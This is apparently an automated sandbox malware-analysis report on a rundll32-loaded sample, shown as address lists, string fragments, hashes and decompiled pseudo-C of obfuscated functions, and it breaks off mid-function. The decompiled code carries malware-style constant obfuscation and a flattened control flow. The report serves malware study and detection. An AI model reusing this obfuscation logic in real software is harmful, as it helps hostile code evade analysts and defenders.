0x00b2c77c
0x00b2c786
0x00b2c78d
0x00b2c794
0x00b2c79b
0x00b2c7a2
0x00b2c7a9
0x00b2c7aa
0x00b2c7b1
0x00b2c7b8
0x00b2c7bf
0x00b2c7c6
0x00b2c7c7
0x00b2c7c8
0x00b2c7cd
0x00b2c7da
0x00b2c7e3
0x00b2c7ea
0x00b2c7ec
0x00b2c7f3
0x00b2c7f6
0x00b2c7fe
0x00b2c803
0x00b2c808
0x00b2c80d
0x00b2c815
0x00b2c820
0x00b2c828
0x00b2c830
0x00b2c83b
0x00b2c846
0x00b2c851
0x00b2c85c
0x00b2c867
0x00b2c872
0x00b2c87d
0x00b2c888
0x00b2c893
0x00b2c89e
0x00b2c8a9
0x00b2c8b4
0x00b2c8bf
0x00b2c8ca
0x00b2c8d2
0x00b2c8dd
0x00b2c8e8
0x00b2c8f0
0x00b2c8fb
0x00b2c906
0x00b2c90e
0x00b2c919
0x00b2c921
0x00b2c929
0x00b2c92e
0x00b2c936
0x00b2c93e
0x00b2c943
0x00b2c94b
0x00b2c950
0x00b2c958
0x00b2c963
0x00b2c972
0x00b2c976
0x00b2c97d
0x00b2c988
0x00b2c993
0x00b2c99b
0x00b2c9a3
0x00b2c9ae
0x00b2c9b9
0x00b2c9c4
0x00b2c9da
0x00b2c9df
0x00b2c9e8
0x00b2c9f3
0x00b2ca05
0x00b2ca0a
0x00b2ca13
0x00b2ca1e
0x00b2ca26
0x00b2ca33
0x00b2ca36
0x00b2ca3a
0x00b2ca3f
0x00b2ca47
0x00b2ca5d
0x00b2ca64
0x00b2ca6f
0x00b2ca77
0x00b2ca7f
0x00b2ca84
0x00b2ca8c
0x00b2ca98
0x00b2ca9d
0x00b2caa3
0x00b2caab
0x00b2cab3
0x00b2cac6
0x00b2cac9
0x00b2cad0
0x00b2cadb
0x00b2caf1
0x00b2caf8
0x00b2cb03
0x00b2cb0b
0x00b2cb10
0x00b2cb15
0x00b2cb1a
0x00b2cb22
0x00b2cb2a
0x00b2cb37
0x00b2cb38
0x00b2cb3c
0x00b2cb44
0x00b2cb4f
0x00b2cb5a
0x00b2cb65
0x00b2cb6d
0x00b2cb75
0x00b2cb80
0x00b2cb84
0x00b2cb8c
0x00b2cb94
0x00b2cb99
0x00b2cb9e
0x00b2cba2
0x00b2cbac
0x00b2cbba
0x00b2cbbd
0x00b2cbc1
0x00b2cbc9
0x00b2cbce
0x00b2cbd6
0x00b2cbe1
0x00b2cbec
0x00b2cbf4
0x00b2cbff
0x00b2cc0a
0x00b2cc15
0x00b2cc20
0x00b2cc2d
0x00b2cc31
0x00b2cc39
0x00b2cc3e
0x00b2cc46
0x00b2cc51
0x00b2cc5c
0x00b2cc67
0x00b2cc72
0x00b2cc7d
0x00b2cc88
0x00b2cc90
0x00b2cc98
0x00b2cca0
0x00b2cca8
0x00b2ccb3
0x00b2ccba
0x00b2ccc5
0x00b2ccd0
0x00b2ccd8
0x00b2ccdd
0x00b2cce2
0x00b2ccea
0x00b2ccf5
0x00b2cd00
0x00b2cd0b
0x00b2cd16
0x00b2cd1e
0x00b2cd23
0x00b2cd2b
0x00b2cd33
0x00b2cd3e
0x00b2cd49
0x00b2cd54
0x00b2cd5f
0x00b2cd6a
0x00b2cd72
0x00b2cd7d
0x00b2cd85
0x00b2cd8d
0x00b2cd95
0x00b2cd9d
0x00b2cda5
0x00b2cdad
0x00b2cdba
0x00b2cdbe
0x00b2cdc3
0x00b2cdcb
0x00b2cdd6
0x00b2cde1
0x00b2cdec
0x00b2cdf7
0x00b2ce02
0x00b2ce0d
0x00b2ce18
0x00b2ce20
0x00b2ce28
0x00b2ce35
0x00b2ce49
0x00b2ce4e
0x00b2ce57
0x00b2ce5f
0x00b2ce6a
0x00b2ce72
0x00b2ce77
0x00b2ce7f
0x00b2ce84
0x00b2ce8c
0x00b2ce97
0x00b2cea2
0x00b2cead
0x00b2ceb5
0x00b2cebd
0x00b2cec5
0x00b2cecd
0x00b2ced5
0x00b2cedd
0x00b2cee5
0x00b2ceea
0x00b2ceef
0x00b2cef7
0x00b2ceff
0x00b2cf0c
0x00b2cf0d
0x00b2cf11
0x00b2cf19
0x00b2cf24
0x00b2cf2c
0x00b2cf37
0x00b2cf4a
0x00b2cf51
0x00b2cf5c
0x00b2cf67
0x00b2cf72
0x00b2cf7a
0x00b2cf85
0x00b2cf98
0x00b2cf9f
0x00b2cfaa
0x00b2cfb7
0x00b2cfbb
0x00b2cfc3
0x00b2cfcb
0x00b2cfd3
0x00b2cfde
0x00b2cfe9
0x00b2cff4
0x00b2cfff
0x00b2d00a
0x00b2d015
0x00b2d020
0x00b2d02b
0x00b2d036
0x00b2d041
0x00b2d049
0x00b2d04e
0x00b2d056
0x00b2d05e
0x00b2d069
0x00b2d074
0x00b2d07c
0x00b2d087
0x00b2d095
0x00b2d099
0x00b2d0a1
0x00b2d0a9
0x00b2d0b1
0x00b2d0bc
0x00b2d0c7
0x00b2d0d2
0x00b2d0df
0x00b2d0ea
0x00b2d0f5
0x00b2d100
0x00b2d108
0x00b2d113
0x00b2d11e
0x00b2d126
0x00b2d132
0x00b2d135
0x00b2d13c
0x00b2d147
0x00b2d152
0x00b2d15d
0x00b2d165
0x00b2d170
0x00b2d186
0x00b2d18d
0x00b2d198
0x00b2d1a0
0x00b2d1a8
0x00b2d1b5
0x00b2d1b8
0x00b2d1bc
0x00b2d1c4
0x00b2d1da
0x00b2d1e8
0x00b2d1eb
0x00b2d1f2
0x00b2d1f9
0x00b2d208
0x00b2d208
0x00b2d208
0x00b2d20d
0x00b2d20d
0x00b2d20f
0x00b2d20f
0x00b2d215
0x00b2d215
0x00b2d386
0x00b2d388
0x00b2d38f
0x00b2d390
0x00b2d29d
0x00b2d29d
0x00b2d2a1
0x00b2d2a1
0x00000000
0x00b2d2a1
0x00b2d221
0x00b2d31f
0x00b2d321
0x00b2d327
0x00b2d327
0x00b2d323
0x00b2d323
0x00b2d323
0x00b2d329
0x00b2d32b
0x00b2d332
0x00b2d332
0x00b2d32d
0x00b2d32d
0x00b2d32d
0x00b2d35b
0x00b2d360
0x00b2d365
0x00b2d36d
0x00000000
0x00b2d36d
0x00b2d22d
0x00b2d315
0x00b2d20d
0x00b2d20d
0x00b2d20f
0x00b2d20f
0x00000000
0x00b2d20f
0x00000000
0x00b2d20d
0x00b2d23a
0x00b2d2f8
0x00b2d2fd
0x00b2d300
0x00b2d304
0x00b2d310
0x00000000
0x00b2d310
0x00b2d242
0x00b2d291
0x00b2d296
0x00b2d29b
0x00000000
0x00b2d29c
0x00b2d24a
0x00b2d639
0x00b2d639
0x00b2d63f
0x00b2d272
0x00b2d27c
0x00b2d27c
0x00b2d645
0x00000000
0x00b2d645
0x00b2d269
0x00000000
0x00b2d398
0x00b2d398
0x00b2d39e
0x00b2d51a
0x00b2d51c
0x00b2d53c
0x00b2d51e
0x00b2d51e
0x00b2d52b
0x00b2d530
0x00b2d533
0x00b2d533
0x00b2d5c9
0x00b2d5d2
0x00b2d5d9
0x00b2d5de
0x00b2d5e1
0x00b2d5e3
0x00b2d62b
0x00b2d630
0x00b2d630
0x00b2d634
0x00000000
0x00b2d634
0x00b2d5e5
0x00b2d5f1
0x00b2d612
0x00b2d617
0x00b2d61a
0x00b2d621
0x00000000
0x00b2d621
0x00b2d3a4
0x00b2d3aa
0x00b2d498
0x00b2d49a
0x00b2d4a6
0x00b2d4a9
0x00b2d4aa
0x00b2d4ac
0x00b2d4c7
0x00b2d4cc
0x00b2d4cf
0x00b2d4d1
0x00b2d4ed
0x00b2d4f2
0x00b2d4f5
0x00b2d4f5
0x00b2d509
0x00b2d50f
0x00b2d510
0x00000000
0x00b2d510
0x00b2d3b0
0x00b2d3b6
0x00b2d423
0x00b2d442
0x00b2d447
0x00b2d449
0x00b2d45a
0x00b2d474
0x00b2d479
0x00000000
0x00b2d479
0x00b2d3b8
0x00b2d3be
0x00b2d414
0x00b2d419
0x00000000
0x00b2d419
0x00b2d3c0
0x00b2d3c6
0x00000000
0x00000000
0x00b2d3e6
0x00b2d3e8
0x00b2d3ed
0x00b2d3f1
0x00b2d3f5
0x00b2d3f5
0x00b2d20d

Strings

@|, xrefs: 00B2CE35
", xrefs: 00B2CFC3
.ll:, xrefs: 00B2D1BC
3, xrefs: 00B2CA13
m^, xrefs: 00B2CAA3
^, xrefs: 00B2C936
Ta$ , xrefs: 00B2D30B
., xrefs: 00B2D0DF
Qjcc, xrefs: 00B2D13C
r, xrefs: 00B2CC20
@l, xrefs: 00B2CEA2
q, xrefs: 00B2CEEF
,, xrefs: 00B2C830
XD, xrefs: 00B2D0B1
Ta$ , xrefs: 00B2D398
?o, xrefs: 00B2D1C4
T, xrefs: 00B2C99B
~, xrefs: 00B2D041
rW, xrefs: 00B2CAF8

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "$.ll:$.$?o$@l$@|$Qjcc$T$Ta$ $Ta$ $XD$^$m^$r$rW$,$3$q$~
API String ID: 0-3595463394
Opcode ID: f358b1700775d727743fe6c6e4d9488161b0cff0a0f71ad7695e96daec78a521
Instruction ID: cec5e365d18fca19e44e2512ecc90e4e9e133bfcc4dcaa79b499867c8b5bf4df
Opcode Fuzzy Hash: f358b1700775d727743fe6c6e4d9488161b0cff0a0f71ad7695e96daec78a521
Instruction Fuzzy Hash: 6F720E71508381CBE3B9CF25D58AB9BBBE1BBC4304F10891DE5D9962A0DBB58849CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00B2D7EB, Relevance: 21.6, Strings: 17, Instructions: 347
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00B2D7EB() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				void* _t365;
				intOrPtr _t367;
				signed int _t379;
				void* _t380;
				void* _t399;
				intOrPtr _t402;
				signed int _t408;
				intOrPtr _t409;
				intOrPtr* _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t416;
				signed int* _t417;
				void* _t419;

				_t417 =  &_v1212;
				_v1164 = 0xe848;
				_v1164 = _v1164 << 0xc;
				_t380 = 0xeb1d0fe;
				_v1164 = _v1164 << 2;
				_v1164 = _v1164 ^ 0x3a120029;
				_v1196 = 0xb50a;
				_v1196 = _v1196 * 0x54;
				_v1196 = _v1196 << 1;
				_v1196 = _v1196 << 0xc;
				_v1196 = _v1196 ^ 0x6ce97179;
				_v1072 = 0xa1a9;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 ^ 0x00006740;
				_v1112 = 0x5ab8;
				_v1112 = _v1112 | 0xd40f1486;
				_v1112 = _v1112 ^ 0xd40f3c8d;
				_v1168 = 0x99b2;
				_v1168 = _v1168 ^ 0x8e209920;
				_v1168 = _v1168 + 0x17b0;
				_v1168 = _v1168 + 0xffff252c;
				_v1168 = _v1168 ^ 0x8e1f3ab7;
				_v1108 = 0x6700;
				_v1108 = _v1108 ^ 0xd74b138d;
				_v1108 = _v1108 ^ 0xd74b4d2a;
				_v1116 = 0xa6d3;
				_v1116 = _v1116 << 0xc;
				_v1116 = _v1116 ^ 0x0a6d47ef;
				_v1144 = 0x46d4;
				_v1144 = _v1144 | 0x60392883;
				_t411 = 0x3e;
				_v1052 = _v1052 & 0x00000000;
				_v1144 = _v1144 / _t411;
				_v1144 = _v1144 ^ 0x018d3ef5;
				_v1212 = 0x195d;
				_v1212 = _v1212 + 0x9a8f;
				_v1212 = _v1212 >> 2;
				_v1212 = _v1212 >> 0xf;
				_v1212 = _v1212 ^ 0x00005610;
				_v1092 = 0x8c48;
				_v1092 = _v1092 | 0x14bcb660;
				_v1092 = _v1092 ^ 0x14bcd719;
				_v1184 = 0xdf30;
				_v1184 = _v1184 | 0x71150163;
				_v1184 = _v1184 + 0xffff3ca6;
				_v1184 = _v1184 >> 5;
				_v1184 = _v1184 ^ 0x03888299;
				_v1100 = 0xf0a2;
				_v1100 = _v1100 >> 2;
				_v1100 = _v1100 ^ 0x00007018;
				_v1076 = 0xde4e;
				_v1076 = _v1076 * 0x25;
				_v1076 = _v1076 ^ 0x0020254d;
				_v1084 = 0x8f7c;
				_v1084 = _v1084 + 0x3023;
				_v1084 = _v1084 ^ 0x00008967;
				_v1136 = 0x4c3;
				_v1136 = _v1136 + 0xbbe6;
				_v1136 = _v1136 | 0x03b94668;
				_v1136 = _v1136 ^ 0x03b9f10c;
				_v1120 = 0xdab0;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0x0003158f;
				_v1080 = 0xb6c1;
				_v1080 = _v1080 ^ 0x2339c7b2;
				_v1080 = _v1080 ^ 0x2339156d;
				_v1152 = 0xaa63;
				_v1152 = _v1152 | 0x7d17af71;
				_v1152 = _v1152 << 0xc;
				_v1152 = _v1152 ^ 0x7af75802;
				_v1088 = 0x49a;
				_v1088 = _v1088 >> 9;
				_v1088 = _v1088 ^ 0x00004f36;
				_v1192 = 0x2678;
				_v1192 = _v1192 + 0xb679;
				_v1192 = _v1192 << 0x10;
				_v1192 = _v1192 + 0xffff3370;
				_v1192 = _v1192 ^ 0xdcf068a3;
				_v1064 = 0xeafb;
				_v1064 = _v1064 << 1;
				_v1064 = _v1064 ^ 0x00019538;
				_v1096 = 0x88f8;
				_t412 = 0x34;
				_v1096 = _v1096 * 0x4f;
				_v1096 = _v1096 ^ 0x002a1ade;
				_v1132 = 0xf8dd;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 * 6;
				_v1132 = _v1132 ^ 0x2ea92e25;
				_v1148 = 0xb66c;
				_v1148 = _v1148 * 0x79;
				_v1148 = _v1148 * 0x37;
				_v1148 = _v1148 ^ 0x12863225;
				_v1044 = 0x2ced;
				_v1044 = _v1044 | 0x6c1d274b;
				_v1044 = _v1044 ^ 0x6c1d554c;
				_v1104 = 0xd4fb;
				_v1104 = _v1104 + 0xc222;
				_v1104 = _v1104 ^ 0x0001c0a4;
				_v1140 = 0xeff1;
				_v1140 = _v1140 | 0x2c578e17;
				_v1140 = _v1140 ^ 0x1f5808a8;
				_v1140 = _v1140 ^ 0x330f90e2;
				_v1156 = 0x54a4;
				_v1156 = _v1156 ^ 0xe69aec3e;
				_v1156 = _v1156 ^ 0x7a062859;
				_v1156 = _v1156 ^ 0x9c9c8f10;
				_v1180 = 0xa2be;
				_v1180 = _v1180 / _t412;
				_v1180 = _v1180 << 0xb;
				_v1180 = _v1180 << 6;
				_v1180 = _v1180 ^ 0x0642737d;
				_v1204 = 0x65ae;
				_v1204 = _v1204 + 0xb2b7;
				_v1204 = _v1204 + 0xbb73;
				_v1204 = _v1204 << 6;
				_v1204 = _v1204 ^ 0x0074b164;
				_v1176 = 0x3ecd;
				_v1176 = _v1176 | 0x1d534930;
				_v1176 = _v1176 << 0xa;
				_v1176 = _v1176 ^ 0x842f9ee3;
				_v1176 = _v1176 ^ 0xc9d04901;
				_v1056 = 0xf360;
				_v1056 = _v1056 | 0x93122b66;
				_v1056 = _v1056 ^ 0x9312fd26;
				_v1124 = 0x4a26;
				_v1124 = _v1124 | 0x286a3d77;
				_v1124 = _v1124 ^ 0x286a2522;
				_v1060 = 0x57ed;
				_v1060 = _v1060 + 0x784b;
				_v1060 = _v1060 ^ 0x0000c3a5;
				_v1068 = 0x69c7;
				_v1068 = _v1068 << 5;
				_v1068 = _v1068 ^ 0x000d6de9;
				_v1208 = 0xffbd;
				_v1208 = _v1208 * 0x3d;
				_v1208 = _v1208 << 5;
				_v1208 = _v1208 + 0x87f5;
				_v1208 = _v1208 ^ 0x079ed184;
				_v1128 = 0x5d27;
				_v1128 = _v1128 >> 0xc;
				_v1128 = _v1128 ^ 0x62edd6dc;
				_v1128 = _v1128 ^ 0x62ed9c54;
				_v1048 = 0x8776;
				_t413 = 0x1e;
				_t408 = _v1052;
				_v1048 = _v1048 * 0xc;
				_v1048 = _v1048 ^ 0x000959b7;
				_v1172 = 0x35cb;
				_t379 = _v1052;
				_v1172 = _v1172 / _t413;
				_v1172 = _v1172 | 0x92682d74;
				_v1172 = _v1172 ^ 0x346a72ec;
				_v1172 = _v1172 ^ 0xa6025f11;
				_v1188 = 0x8f0f;
				_t414 = 0x66;
				_t416 = _v1052;
				_v1188 = _v1188 / _t414;
				_v1188 = _v1188 << 5;
				_v1188 = _v1188 + 0x12e7;
				_v1188 = _v1188 ^ 0x00003fc5;
				_v1200 = 0x51b9;
				_v1200 = _v1200 | 0x17a7f9cb;
				_v1200 = _v1200 << 8;
				_v1200 = _v1200 | 0xe40f2208;
				_v1200 = _v1200 ^ 0xe7fffb08;
				_v1160 = 0x57cd;
				_v1160 = _v1160 + 0xffffc371;
				_v1160 = _v1160 ^ 0x54a04296;
				_v1160 = _v1160 ^ 0x54a059b8;
				while(1) {
					L1:
					_t399 = 0x5c;
					do {
						while(1) {
							L2:
							_t419 = _t380 - 0x21daabfe;
							if(_t419 > 0) {
								break;
							}
							if(_t419 == 0) {
								_t409 =  *0xb3ca2c; // 0x505cc8
								_t410 = _t409 + 0x230;
								while(1) {
									__eflags =  *_t410 - _t399;
									if( *_t410 == _t399) {
										break;
									}
									_t410 = _t410 + 2;
									__eflags = _t410;
								}
								_t408 = _t410 + 2;
								_t380 = 0x3af90ff3;
								continue;
							}
							if(_t380 == 0x222340b) {
								E00B25FB2(_v1208, _v1128, _t379);
								L27:
								return _v1052;
							}
							if(_t380 == 0x88778bb) {
								_t416 = E00B254FE(_v1088, _v1160, _v1192, _v1064, _t380, _t380, _t408, _v1096, _v1200, _v1172, _v1132, _v1148, _v1044, _t380, _v1104, _t408,  &_v1040, _v1188, _t380, _t379, _v1140, _v1156, _t380, _v1180);
								_t417 =  &(_t417[0x16]);
								__eflags = _t416;
								if(_t416 == 0) {
									_t380 = 0x222340b;
								} else {
									_t380 = 0x212fea65;
									_v1052 = 1;
								}
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 == 0xeb1d0fe) {
								_push(_t380);
								_push(_t380);
								E00B2C6C7(_v1196, _v1072,  &_v520, _t380, _v1112, _v1164, _v1168);
								_t417 =  &(_t417[7]);
								_t380 = 0x3304c1c2;
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 != 0x212fea65) {
								goto L24;
							}
							E00B342DA(_t416, _v1204, _v1176, _v1056, _t379, _v1124);
							_t417 =  &(_t417[4]);
							_t380 = 0x2e0be9f8;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x2e0be9f8;
						if(_t380 == 0x2e0be9f8) {
							E00B25FB2(_v1060, _v1068, _t416);
							_t380 = 0x222340b;
							_t399 = 0x5c;
							goto L24;
						}
						__eflags = _t380 - 0x3304c1c2;
						if(__eflags == 0) {
							_push(_v1116);
							_t365 = E00B3889D(0xb3c930, _v1108, __eflags);
							_t367 =  *0xb3ca2c; // 0x505cc8
							_t402 =  *0xb3ca2c; // 0x505cc8
							E00B229E3(_t402, 0x104, _t365, _v1144, _v1212, _v1092, _t367 + 0x230,  &_v1040, _v1184, _v1100);
							E00B32025(_v1076, _t365, _v1084, _v1136);
							_t417 =  &(_t417[0xc]);
							_t380 = 0x21daabfe;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x3af90ff3;
						if(_t380 != 0x3af90ff3) {
							goto L24;
						}
						_t379 = E00B22959(_t380, _v1120, _v1080, _v1152, _v1048);
						_t417 =  &(_t417[4]);
						__eflags = _t379;
						if(_t379 == 0) {
							goto L27;
						}
						_t380 = 0x88778bb;
						goto L1;
						L24:
						__eflags = _t380 - 0x27fd7905;
					} while (_t380 != 0x27fd7905);
					goto L27;
				}
			}

0x00b2d7eb
0x00b2d7f1
0x00b2d7fb
0x00b2d800
0x00b2d805
0x00b2d80a
0x00b2d812
0x00b2d823
0x00b2d827
0x00b2d82b
0x00b2d830
0x00b2d838
0x00b2d843
0x00b2d84b
0x00b2d856
0x00b2d85e
0x00b2d866
0x00b2d86e
0x00b2d876
0x00b2d87e
0x00b2d886
0x00b2d88e
0x00b2d896
0x00b2d89e
0x00b2d8a6
0x00b2d8ae
0x00b2d8b6
0x00b2d8bb
0x00b2d8c3
0x00b2d8cb
0x00b2d8d9
0x00b2d8dc
0x00b2d8e4
0x00b2d8e8
0x00b2d8f0
0x00b2d8f8
0x00b2d900
0x00b2d905
0x00b2d90a
0x00b2d912
0x00b2d91d
0x00b2d928
0x00b2d933
0x00b2d93b
0x00b2d943
0x00b2d94b
0x00b2d950
0x00b2d958
0x00b2d963
0x00b2d96b
0x00b2d976
0x00b2d989
0x00b2d990
0x00b2d99b
0x00b2d9a6
0x00b2d9b1
0x00b2d9bc
0x00b2d9c4
0x00b2d9cc
0x00b2d9d4
0x00b2d9dc
0x00b2d9e4
0x00b2d9e9
0x00b2d9f1
0x00b2d9fc
0x00b2da07
0x00b2da12
0x00b2da1a
0x00b2da22
0x00b2da27
0x00b2da2f
0x00b2da3a
0x00b2da42
0x00b2da4f
0x00b2da57
0x00b2da5f
0x00b2da64
0x00b2da6c
0x00b2da74
0x00b2da7f
0x00b2da86
0x00b2da91
0x00b2daa6
0x00b2daa7
0x00b2daae
0x00b2dab9
0x00b2dac1
0x00b2dacb
0x00b2dacf
0x00b2dad7
0x00b2dae4
0x00b2daed
0x00b2daf1
0x00b2daf9
0x00b2db04
0x00b2db0f
0x00b2db1a
0x00b2db22
0x00b2db2a
0x00b2db32
0x00b2db3a
0x00b2db42
0x00b2db4a
0x00b2db52
0x00b2db5a
0x00b2db62
0x00b2db6a
0x00b2db72
0x00b2db80
0x00b2db84
0x00b2db89
0x00b2db8e
0x00b2db96
0x00b2db9e
0x00b2dba6
0x00b2dbae
0x00b2dbb3
0x00b2dbbb
0x00b2dbc3
0x00b2dbcb
0x00b2dbd0
0x00b2dbd8
0x00b2dbe0
0x00b2dbeb
0x00b2dbf6
0x00b2dc01
0x00b2dc09
0x00b2dc11
0x00b2dc19
0x00b2dc24
0x00b2dc2f
0x00b2dc3a
0x00b2dc45
0x00b2dc4d
0x00b2dc58
0x00b2dc65
0x00b2dc69
0x00b2dc6e
0x00b2dc76
0x00b2dc7e
0x00b2dc86
0x00b2dc8b
0x00b2dc93
0x00b2dc9b
0x00b2dcb2
0x00b2dcb5
0x00b2dcbc
0x00b2dcc3
0x00b2dcce
0x00b2dcde
0x00b2dce5
0x00b2dce9
0x00b2dcf1
0x00b2dcf9
0x00b2dd01
0x00b2dd0d
0x00b2dd10
0x00b2dd17
0x00b2dd1b
0x00b2dd20
0x00b2dd28
0x00b2dd30
0x00b2dd38
0x00b2dd40
0x00b2dd45
0x00b2dd4d
0x00b2dd55
0x00b2dd5d
0x00b2dd65
0x00b2dd6d
0x00b2dd75
0x00b2dd75
0x00b2dd77
0x00b2dd78
0x00b2dd78
0x00b2dd78
0x00b2dd78
0x00b2dd7e
0x00000000
0x00000000
0x00b2dd84
0x00b2de9f
0x00b2dea5
0x00b2deb0
0x00b2deb0
0x00b2deb3
0x00000000
0x00000000
0x00b2dead
0x00b2dead
0x00b2dead
0x00b2deb5
0x00b2deb8
0x00000000
0x00b2deb8
0x00b2dd90
0x00b2dfca
0x00b2dfd0
0x00b2dfe1
0x00b2dfe1
0x00b2dd9c
0x00b2de77
0x00b2de79
0x00b2de7c
0x00b2de7e
0x00b2de95
0x00b2de80
0x00b2de80
0x00b2de85
0x00b2de85
0x00b2dd75
0x00b2dd75
0x00b2dd77
0x00000000
0x00b2dd77
0x00b2dd75
0x00b2dda4
0x00b2ddd7
0x00b2ddd8
0x00b2ddfc
0x00b2de01
0x00b2de04
0x00b2dd75
0x00b2dd75
0x00b2dd77
0x00000000
0x00b2dd77
0x00b2dd75
0x00b2ddac
0x00000000
0x00000000
0x00b2ddc8
0x00b2ddcd
0x00b2ddd0
0x00b2dd75
0x00b2dd75
0x00b2dd77
0x00000000
0x00b2dd77
0x00b2dd75
0x00b2dec2
0x00b2dec8
0x00b2dfa5
0x00b2dfad
0x00b2dfb2
0x00000000
0x00b2dfb2
0x00b2dece
0x00b2ded4
0x00b2df14
0x00b2df21
0x00b2df42
0x00b2df5c
0x00b2df68
0x00b2df84
0x00b2df89
0x00b2df8c
0x00b2dd75
0x00b2dd75
0x00b2dd77
0x00000000
0x00b2dd77
0x00b2dd75
0x00b2ded6
0x00b2dedc
0x00000000
0x00000000
0x00b2defd
0x00b2deff
0x00b2df02
0x00b2df04
0x00000000
0x00000000
0x00b2df0a
0x00000000
0x00b2dfb3
0x00b2dfb3
0x00b2dfb3
0x00000000
0x00b2dfbf

Strings

H, xrefs: 00B2D7F1
"%j(, xrefs: 00B2DC11
'], xrefs: 00B2DC7E
M% , xrefs: 00B2D990
Kx, xrefs: 00B2DC24
rj4, xrefs: 00B2DCF1
), xrefs: 00B2D80A
6O, xrefs: 00B2DA42
,, xrefs: 00B2DAF9
Gm, xrefs: 00B2D8BB
e/!, xrefs: 00B2DDA6
x&, xrefs: 00B2DA4F
#0, xrefs: 00B2D9A6
e/!, xrefs: 00B2DE80
@g, xrefs: 00B2D84B
yql, xrefs: 00B2D830
m, xrefs: 00B2DC4D

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: "%j($#0$']$)$6O$@g$H$Kx$M% $e/!$e/!$x&$yql$,$Gm$m$rj4
API String ID: 1725840886-131801274
Opcode ID: 8a13eb18ce56afe0e6343b95954f09409c7aa1a720708e1bf277d6d4f36d8f32
Instruction ID: 44de6a66d3d7ea21744f50a2cc31b61b2849b0b44e3529bf32f619c1c0cf6afb
Opcode Fuzzy Hash: 8a13eb18ce56afe0e6343b95954f09409c7aa1a720708e1bf277d6d4f36d8f32
Instruction Fuzzy Hash: 1F021371108380DFE369CF61D58AA5BBBE1FBC5748F10895DE1DA862A0C7B58948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00B2F98C, Relevance: 20.4, Strings: 16, Instructions: 390
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00B2F98C(intOrPtr* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				intOrPtr _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				intOrPtr _v268;
				void* __ecx;
				void* _t344;
				void* _t374;
				signed int _t377;
				intOrPtr _t391;
				void* _t392;
				intOrPtr _t393;
				signed int _t395;
				intOrPtr _t396;
				signed int _t397;
				intOrPtr* _t401;
				intOrPtr _t403;
				intOrPtr* _t416;
				char* _t448;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				char* _t460;
				void* _t461;
				intOrPtr* _t468;
				void* _t470;
				void* _t472;

				_t401 = _a4;
				_push(_a16);
				_t468 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_t401);
				_push(__edx);
				E00B2602B(_t344);
				_v180 = 0x2a54;
				_t470 =  &_v268 + 0x18;
				_v180 = _v180 ^ 0xdbb28899;
				_t403 = 0;
				_t461 = 0x405be48;
				_v268 = 0;
				_t450 = 0x55;
				_v180 = _v180 * 0x34;
				_v180 = _v180 ^ 0xa04911e4;
				_v164 = 0x788;
				_v164 = _v164 * 0x79;
				_v164 = _v164 ^ 0x00038f4a;
				_v260 = 0xdd03;
				_v260 = _v260 ^ 0x82285f25;
				_v260 = _v260 >> 7;
				_v260 = _v260 << 4;
				_v260 = _v260 ^ 0x104552fc;
				_v132 = 0x81fa;
				_v132 = _v132 | 0x4b6553e1;
